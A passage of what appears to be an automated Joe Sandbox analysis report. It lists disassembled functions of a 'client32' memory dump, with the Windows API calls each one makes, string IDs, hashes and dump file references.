                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1365068426-0
                                                                                                                                    • Opcode ID: c6ec65f531cfde515abaa01a675cc8342fa0e358ec51e2099163275590dd74ed
                                                                                                                                    • Instruction ID: fe78a26210fd101f166c275b46dcf80d6e3257aca979198b374a34756ee526d8
                                                                                                                                    • Opcode Fuzzy Hash: c6ec65f531cfde515abaa01a675cc8342fa0e358ec51e2099163275590dd74ed
                                                                                                                                    • Instruction Fuzzy Hash: E7D05E756C430CBBF2189BD0CE4AFA9B7ACD70CB17F100254FB21975C49AB169008BB6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ControlDevicekeybd_event
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1421710848-0
                                                                                                                                    • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                                    • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                                                                    • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                                    • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C24E Relevance: .1, Instructions: 83COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3b745e3442a8fbbbc241bf5677c7f88263b2cc9183a251293c3b3f6fedcfbdc0
                                                                                                                                    • Instruction ID: b67ce35ce89cf9a4d652fbba927be539999403a09c287c3f19f1121c2f65907f
                                                                                                                                    • Opcode Fuzzy Hash: 3b745e3442a8fbbbc241bf5677c7f88263b2cc9183a251293c3b3f6fedcfbdc0
                                                                                                                                    • Instruction Fuzzy Hash: D3214932A49282CFE7058EE8C4D079EFB4DEB56754F10413EE9584B181DAF35862C762
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100C530 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 185libraryloaderthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000010), ref: 1100C587
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000028), ref: 1100C58D
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000040), ref: 1100C593
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000058), ref: 1100C599
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1100C5A3
                                                                                                                                    • GetVersion.KERNEL32 ref: 1100C6AE
                                                                                                                                    • LoadLibraryA.KERNEL32(msacm32.dll), ref: 1100C6BF
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,acmStreamOpen), ref: 1100C6DB
                                                                                                                                    • GetProcAddress.KERNEL32(?,acmStreamClose), ref: 1100C6EF
                                                                                                                                    • GetProcAddress.KERNEL32(?,acmStreamSize), ref: 1100C703
                                                                                                                                    • GetProcAddress.KERNEL32(?,acmStreamPrepareHeader), ref: 1100C717
                                                                                                                                    • GetProcAddress.KERNEL32(?,acmStreamConvert), ref: 1100C72B
                                                                                                                                    • CreateThread.KERNEL32 ref: 1100C75A
                                                                                                                                    • GetProcAddress.KERNEL32(?,acmStreamUnprepareHeader), ref: 1100C73F
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 1100C780
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1100C787
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$CriticalInitializeSection$CreateExitProcessThreadwsprintf$CloseErrorEventHandleLastLibraryLoadMessagePriorityVersion
                                                                                                                                    • String ID: ..\ctl32\AUDIO.CPP$acmStreamClose$acmStreamConvert$acmStreamOpen$acmStreamPrepareHeader$acmStreamSize$acmStreamUnprepareHeader$hAudio$idata->hEvent$msacm32.dll
                                                                                                                                    • API String ID: 2404373768-2117072583
                                                                                                                                    • Opcode ID: 88b6daa448d1f01ff89e3305e8a25eec61f04d0d86806cde4262f423bdf987aa
                                                                                                                                    • Instruction ID: 049fab11b20bb768323fb1b34283fa62b23a8e76d4d9a3094b6e7a7a4f077f96
                                                                                                                                    • Opcode Fuzzy Hash: 88b6daa448d1f01ff89e3305e8a25eec61f04d0d86806cde4262f423bdf987aa
                                                                                                                                    • Instruction Fuzzy Hash: FD61AEB5A40709ABEB20DFB5CD45BDAFBE4AF54304F00492EE96AD7280EB74B500CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindowwsprintf
                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                    • API String ID: 4003178439-770455996
                                                                                                                                    • Opcode ID: 5da590de6c2978171ff923b34d2cc0c5952eb2660872f0c2ee764eb010f57f18
                                                                                                                                    • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                                                                    • Opcode Fuzzy Hash: 5da590de6c2978171ff923b34d2cc0c5952eb2660872f0c2ee764eb010f57f18
                                                                                                                                    • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11015840 Relevance: 42.2, APIs: 28, Instructions: 170COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 1101586F
                                                                                                                                    • GetWindowRect.USER32 ref: 11015887
                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110158B1
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110158C5
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 110158D0
                                                                                                                                    • BeginPath.GDI32(00000000), ref: 110158DD
                                                                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015900
                                                                                                                                    • EndPath.GDI32(00000000), ref: 11015907
                                                                                                                                    • PathToRegion.GDI32(00000000), ref: 1101590E
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015920
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015936
                                                                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 11015950
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1101595E
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101596E
                                                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 1101597B
                                                                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 1101599A
                                                                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110159A9
                                                                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110159BC
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110159C9
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110159D3
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110159DD
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110159E6
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110159EF
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110159F8
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015A02
                                                                                                                                    • DeleteObject.GDI32(?), ref: 11015A0B
                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015A15
                                                                                                                                    • EndPaint.USER32(?,?), ref: 11015A29
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1317707293-0
                                                                                                                                    • Opcode ID: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
                                                                                                                                    • Instruction ID: e7a7d0d35206815f70b1bb972d69f7a8e5722a3a2875c7dff22017cd80ac6707
                                                                                                                                    • Opcode Fuzzy Hash: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
                                                                                                                                    • Instruction Fuzzy Hash: 6F51FA75A41228AFDB14DBA4CD88FAEB7B9FF89304F004199E51997244DB74AE40CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11003800 Relevance: 40.7, APIs: 27, Instructions: 240COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000004), ref: 1100385F
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1100387A
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 1100388D
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110038A4
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110038BB
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110038D2
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110038F5
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100390C
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003923
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 1100393A
                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11003951
                                                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 11003958
                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FD), ref: 11003966
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003982
                                                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 1100398B
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11003999
                                                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039B2
                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 110039C6
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110039D4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110039DE
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110039EC
                                                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 110039F5
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11003A02
                                                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003A1E
                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 11003A35
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11003A43
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11003A4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1903512896-0
                                                                                                                                    • Opcode ID: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
                                                                                                                                    • Instruction ID: aabe104b4c11b9f3e9ba86a19e2760383e051eecf234c5ca32d00541c09823f7
                                                                                                                                    • Opcode Fuzzy Hash: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
                                                                                                                                    • Instruction Fuzzy Hash: D18170B5900209AFEB14DFA4CC85EBFB7B9FF88704F104658F611A7681D770A941CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11146270 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11143CE0: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 11143D1B
                                                                                                                                      • Part of subcall function 11143CE0: wsprintfA.USER32 ref: 11143D55
                                                                                                                                    • GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 111462A5
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 111462B2
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 111462BF
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 111462CC
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 111462D9
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 111462E6
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 111462F3
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 11146300
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 1114630D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 1114631A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$Module$FileHandleNamewsprintf
                                                                                                                                    • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                                    • API String ID: 3686653098-3703587661
                                                                                                                                    • Opcode ID: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
                                                                                                                                    • Instruction ID: f57ee56c394f0cb9b00f8b4099bcc1512020c1dff5e65ba52801e9a68d189d03
                                                                                                                                    • Opcode Fuzzy Hash: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
                                                                                                                                    • Instruction Fuzzy Hash: 5A01827491123666CB157F7B9C98ECBFEBC9B8631CB814436F41493506D6B89004CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C82C Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C834
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1116C856
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1116C863
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1116C870
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1116C87D
